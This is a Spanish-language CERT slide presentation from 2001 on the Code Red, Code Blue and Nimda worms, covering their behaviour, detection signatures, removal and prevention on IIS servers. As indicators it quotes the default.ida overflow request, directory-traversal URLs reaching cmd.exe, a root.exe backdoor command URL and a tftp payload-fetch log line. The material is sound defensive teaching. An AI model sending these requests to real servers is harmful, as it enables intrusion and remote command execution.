1 / 21

Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001

Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001. IX Grupo de coordinación IRIS-CERT Últimas tendencias: Gusanos en equipos NT. Agenda. Terminología Gusanos CODE RED (CRv1, CRv2a, CRv2b) http://www.cert.org/advisories/CA-2001-19.html http://www.cert.org/advisories/CA-2001-23.html

neva
Download Presentation

Jornadas Técnicas RedIRIS 2001 Pamplona, Octubre 2001

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Jornadas Técnicas RedIRIS 2001Pamplona, Octubre 2001 IX Grupo de coordinación IRIS-CERT Últimas tendencias: Gusanos en equipos NT

  2. Agenda • Terminología • Gusanos • CODE RED (CRv1, CRv2a, CRv2b) http://www.cert.org/advisories/CA-2001-19.html http://www.cert.org/advisories/CA-2001-23.html • CODE RED II http://www.cert.org/incident_notes/IN-2001-09.html http://www.incidents.org/react/code_redII.php • CODE BLUE http://xforce.iss.net/alerts/advise96.php • W32/NIMDA // “CONCEPT VIRUS (CV) V 5.” http://www.cert.org/advisories/CA-2001-26.html http://www.incidents.org/react/nimda.pdf • Medidas preventivas

  3. Terminología • Gusano Programa que puede ejecutarse independientemente y que se puede propagar a otras máquinas. • “The Shockware Rider” John Brunner 1975 • Morris Worm (“The Internet Worm Incident”) 1988 • Virus Secuencia de código que se inserta en otros programas (“hosts”). Necesita la intervención humana para que se ejecute su programa “hosts”.

  4. CODE RED.Sistemas afectados • Windows NT con IIS 4.0/5.0 y Index Server 2.0 instalado • Windows 2000 con IIS 4.0/5.0 y Index Server instalado http://www.microsoft.com/technet/security/bulletin/MS01-044.asp http://www.microsoft.com/technet/security/bulletin/MS01-033.asp • Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS) • Cisco 600 series DSL routers http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml

  5. CODE RED.Descripción (CRv1) • Actividad dependiente de la fecha del sistema: • Día 1-19  Actividad de propagación • Genera direcciones IP aleatorias • IIS 4.0/5.0 + IDA  infectada • Cisco 600 series DSL routers  El router deja de reenviar paquetes • No IIS/puerto 80 abierto  logea • Se pueden producir re-infecciones • Degradación de rendimiento y DoS • Idioma Inglés (US)?  Modificación páginas WWW • Día 20-27  DoS contra www.whitehouse.gov • Día 28-final mes  Duerme infinitamente

  6. CODE RED.Huellas • En el sistema /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a • En la red • Tráfico desde nuestra máquina (infectada) al puerto 80/tcp de máquinas aleatorias

  7. CODE RED.Variaciones • CRv2a • No modifica páginas Web • Selección de víctimas aleatorias • CRv2b • No modifica páginas Web • Selección de victimas mejorado • Busca www.whitehouse.gov en DNS

  8. CODE RED.Detección y Eliminación • Aumento carga del sistema • Aumento conexiones externas al puerto 80/tcp hacia direcciones aleatorias (netstat –na) • Code Red FAQ http://incidents.org/react/code_red.php • Gusano residente en memoria  reiniciar la máquina • No nos salva de posteriores re-infecciones • El atacante sigue teniendo control total de la máquina • Aplicar parches recomendados • CodeRedscanner http://www.cymru.com/~robt/Tools/coderedscanner-2.5.tar.gz • Retina CodeRed Scanner http://www.eeye.com/html/Research/Tools/RetinaCodeRed.exe

  9. CODE RED II.Sistemas afectados • Windows 2000 con IIS 4.0/5.0 y Index Server instalado • Windows NT 4.0 con IIS 4.0/5.0 y Index Server 2.0 instalado http://www.microsoft.com/technet/security/bulletin/MS01-044.asp http://www.microsoft.com/technet/security/bulletin/MS01-033.asp • Cisco CallManager, Unity Server, uOne, ICS7750, Building Broadband Service Manager (instalan IIS) • Cisco 600 series DSL routers http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml

  10. CODE RED II.Descripción • Chequea si el sistema ha sido infectado con anterioridad • Actividad de propagación: • La agresividad del escaneo depende del lenguaje del sistema • Escaneo de direcciones IP de la misma subred de clase A o B (método probabilístico)  Efectos colaterales de saturación • Copia %SYSTEM%CMD.EXE (puerta trasera) • c:\inetpub\scripts\root.exe • c:\progra~1\common~1\systema\MSADC\root.exe • d:\inetpub\scripts\root.exe • d:\progra~1\common~1\systema\MSADC\root.exe • Instala troyano explorer.exe (c:\ y d:\) http: // IP/c/inetpub/scripts/root.exe/c+ARBITRARY_COMMAND

  11. CODE RED II.Huellas • En el sistema GET/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a • En la red • Tráfico desde nuestra máquina (infectada) al puerto 80/tcp de otras máquinas vecinas

  12. CODE RED II.Detección y eliminación • Aumento carga del sistema • Aumento conexiones externas al puerto 80/tcp (netstat –na) (IPs vecinas) • Code Red FAQ http://incidents.org/react/code_red.php • AntiCodeRed2.vbs http://www.incidents.org/react/AntiCodeRed2.vbs • Microsoft http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp • Formatear disco duro • Reinstalar software (aplicando parches recomendados)

  13. CODE BLUE.Sistemas afectados • Máquinas con IIS 4.0/5.0 instalado • IIS Extended UNICODE Directory Traversal Vulnerability http://xforce.iss.net/alerts/advise68.php GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir

  14. CODE BLUE.Descripción • Reside en memoria • Instala un Visual Basic Script (d.vbs) que elimina el mapeo ISAPI para ficheros “.ida”, “.idq”, “.printer” • Carga una DDL (httpext.dll) y un .EXE (svchost.exe) • Propagación  escaneo IPs vecinas • 10 am – 11 am GMT  Ataque de inundación contra una IP de China

  15. CODE BLUE.Eliminación • Con Regedit encontrar la clave del registro HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run • Buscar y borrar la entrada del registro para c:\svchost.exe • Eliminar los archivos c:\svchost.exe y c:\d.vbs • Reiniciar el ordenador • Aplicar parche recomendado

  16. W32/NIMDA.Sistemas afectados • Microsoft Windows 95, 98, ME, NT y 2000 • Formas de propagarse • De cliente a cliente (vía mail/recursos de red compartidos) http://www.cert.org/advisories/CA-2001-06.html • De servidor Web a cliente (por navegación sobre páginas modificadas) • De cliente a servidor Web • IIS Extended UNICODE Directory Traversal Vulnerability http://www.kb.cert.org/vuls/id/111677 • Puertas traseras dejadas por Code Red II y sadmin/IIS http://www.cert.org/incident_notes/IN-2001-09.html http://www.cert.org/advisories/CA-2001-11.html

  17. W32/NIMDA.Descripción • Manda copias de sí mismo a todas las direcciones encontradas en la libreta de direcciones • Escaneo de IPs aleatorias siguiendo método probabilístico • Intenta transferirse a máquinas vulnerables (IIS) vía tftp (69/udp) • Recorre todos los directorios en el sistema y se copia como README.EML • Si encuentra archivos .html o .asp incluye código Javascript que permitirá propagación al navegar por esas páginas • Crea una cuenta “Guest” (NT y 2000) perteneciente al grupo “Administrator” • Activa la compartición de la unidad c:\ (C$) • Crea troyanos de aplicaciones legítimas previamente instaladas en el sistema

  18. W32/NIMDA.Huellas GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../ winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

  19. W32/NIMDA.Detección y eliminación • Buscar • root.exe • Admin.dll • Ficheros .eml y .nws extraños • Log: /c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 x.x.x.x  máquina atacante 200  comando realizado con éxito • Formatear disco duro • Reinstalar software (aplicando parches recomendados)

  20. Medidas preventivas • Instalar sólo los servicios estrictamente necesarios • Permitir acceso sólo a los servidores públicos • Mantener las máquinas actualizadas con los últimos parches de seguridad • Hotfix (Microsoft) http://support.microsoft.com/support/kb/articles/q303/2/15.asp?id=303215&sd=tech • Desactivar extensiones dañinas en IIS • Lockdown (Microsoft) http://www.microsoft.com/technet/security/tools/locktool.asp • Bloquear el tráfico HTTP en función de la URL que se solicita (Cisco  nbar+acl) http://www.cisco.com/warp/public/63/nimda.shtml http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml • Cambiar el directorio base de la instalación de Windows NT • Chequear/controlar los logs de los servidores Web • Contestar/actuar rápidamente ante denuncias.

More Related